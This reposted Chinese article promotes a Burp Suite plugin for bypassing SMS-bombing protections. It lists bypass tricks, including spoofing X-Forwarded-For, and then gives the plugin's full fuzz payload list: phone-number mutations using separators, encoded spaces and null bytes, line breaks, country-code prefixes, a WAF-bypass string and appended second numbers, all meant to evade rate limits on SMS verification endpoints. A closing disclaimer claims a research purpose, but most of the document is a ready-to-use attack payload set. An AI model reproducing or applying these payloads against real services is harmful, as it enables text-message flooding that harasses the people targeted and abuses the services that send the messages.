Burp suite 短信轰炸辅助绕过插件
项目地址:
https://github.com/yuziiiiiiiiii/SMS_Bomb_Fuzzer
绕过手段包含但不限于以下:参数污染参数复用填充垃圾字符特殊字符号码区号接口遍历组合测试
还有一些可能校验IP,修改XXF也许能绕过。
项目中的规则xxxxxxxxxxx对应轰炸的测试手机号,拿出来,方便添加自己的fuzz库
xxxxxxxxxxx,xxxxxxxxxxx,,xxxxxxxxxxx,,,xxxxxxxxxxx,,,,xxxxxxxxxxx,,,,,,,,,,xxxxxxxxxxx,,,,xxxxxxxxxxx,,,xxxxxxxxxxx,,xxxxxxxxxxx,xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx%20xxxxxxxxxxx%20%20xxxxxxxxxxx%20%20%20xxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx%20xxxxxxxxxxx%20%20xxxxxxxxxxx%20%20%20@xxxxxxxxxxx@@xxxxxxxxxxx@@@xxxxxxxxxxxxxxxxxxxxxx@xxxxxxxxxxx@@xxxxxxxxxxx@@@%00xxxxxxxxxxx%00%00xxxxxxxxxxx%00%00%00xxxxxxxxxxxxxxxxxxxxxx%00xxxxxxxxxxx%00%00xxxxxxxxxxx%00%00%00xxxxxxxxxxx\nxxxxxxxxxxx\n\nxxxxxxxxxxx\n\n\nxxxxxxxxxxx\n\n\n\n\nxxxxxxxxxxx\n\nxxxxxxxxxxx\n\n\nxxxxxxxxxxx\n\n\n\nxxxxxxxxxxxxxxxxxxxxxx\rxxxxxxxxxxx\r\rxxxxxxxxxxx\r\r\rxxxxxxxxxxx\r\r\r\r\rxxxxxxxxxxx\r\rxxxxxxxxxxx\r\r\rxxxxxxxxxxx\r\r\r\rxxxxxxxxxxxxxxxxxxxxxx+xxxxxxxxxxx++xxxxxxxxxxx+++xxxxxxxxxxx+++++xxxxxxxxxxx++xxxxxxxxxxx+++xxxxxxxxxxx++++xxxxxxxxxxxxxxxxxxxxxx-xxxxxxxxxxx--xxxxxxxxxxx---xxxxxxxxxxx-----xxxxxxxxxxx--xxxxxxxxxxx---xxxxxxxxxxx----xxxxxxxxxxxxxxxxxxxxxx*xxxxxxxxxxx**xxxxxxxxxxx***xxxxxxxxxxx*****xxxxxxxxxxx**xxxxxxxxxxx***xxxxxxxxxxx****xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxx//xxxxxxxxxxx///xxxxxxxxxxx/////xxxxxxxxxxx//xxxxxxxxxxx///xxxxxxxxxxx////xxxxxxxxxxx+86xxxxxxxxxxx+86 xxxxxxxxxxx+86%20xxxxxxxxxxx+12xxxxxxxxxxx+12 xxxxxxxxxxx+12%20xxxxxxxxxxx+852xxxxxxxxxxx+852 xxxxxxxxxxx+852%20xxxxxxxxxxx+853xxxxxxxxxxx+853 xxxxxxxxxxx+853%20xxxxxxxxxxx0086xxxxxxxxxxx0086 xxxxxxxxxxx0086%20xxxxxxxxxxx0012xxxxxxxxxxx0012 xxxxxxxxxxx0012%20xxxxxxxxxxx00852xxxxxxxxxxx00852 xxxxxxxxxxx00852%20xxxxxxxxxxx00853xxxxxxxxxxx00853 xxxxxxxxxxx00853%20xxxxxxxxxxx9986xxxxxxxxxxx9986 xxxxxxxxxxx9986%20xxxxxxxxxxx9912xxxxxxxxxxx9912 xxxxxxxxxxx9912%20xxxxxxxxxxx99852xxxxxxxxxxx99852 xxxxxxxxxxx99852%20xxxxxxxxxxx99853xxxxxxxxxxx99853 xxxxxxxxxxx99853%20xxxxxxxxxxx86xxxxxxxxxxx86 xxxxxxxxxxx86%20xxxxxxxxxxx12xxxxxxxxxxx12 xxxxxxxxxxx12%20xxxxxxxxxxx852xxxxxxxxxxx852 xxxxxxxxxxx852%20xxxxxxxxxxx853xxxxxxxxxxx853 xxxxxxxxxxx853%20xxxxxxxxxxx086xxxxxxxxxxx086 xxxxxxxxxxx086%20xxxxxxxxxxx012xxxxxxxxxxx012 xxxxxxxxxxx012%20xxxxxxxxxxx0852xxxxxxxxxxx0852 xxxxxxxxxxx0852%20xxxxxxxxxxx0853xxxxxxxxxxx0853 xxxxxxxxxxx0853%20xxxxxxxxxxx%86xxxxxxxxxxx%86 xxxxxxxxxxx%86%2%xxxxxxxxxxx%12xxxxxxxxxxx%12 xxxxxxxxxxx%12%2%xxxxxxxxxxx%852xxxxxxxxxxx%852 xxxxxxxxxxx%852%2%xxxxxxxxxxx%853xxxxxxxxxxx%853 xxxxxxxxxxx%853%2%xxxxxxxxxxx 0xxxxxxxxxxx%200xxxxxxxxxxx0xxxxxxxxxxx00xxxxxxxxxxx000xxxxxxxxxxx0000xxxxxxxxxxx00000xxxxxxxxxxx+)WAFXR#!Txxxxxxxxxxxxxxxxxxxxxx+)WAFXR#!Txxxxxxxxxxx.0xxxxxxxxxxx.1xxxxxxxxxxx.2xxxxxxxxxxx.3xxxxxxxxxxx,18888888888xxxxxxxxxxx,,18888888888xxxxxxxxxxx,,,18888888888xxxxxxxxxxx&18888888888xxxxxxxxxxx&&18888888888xxxxxxxxxxx&&&18888888888xxxxxxxxxxx&&&&18888888888
原文始发于微信公众号(进击的HACK):SMS_Bomb_Fuzzer——Burp suite 短信轰炸辅助绕过插件
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论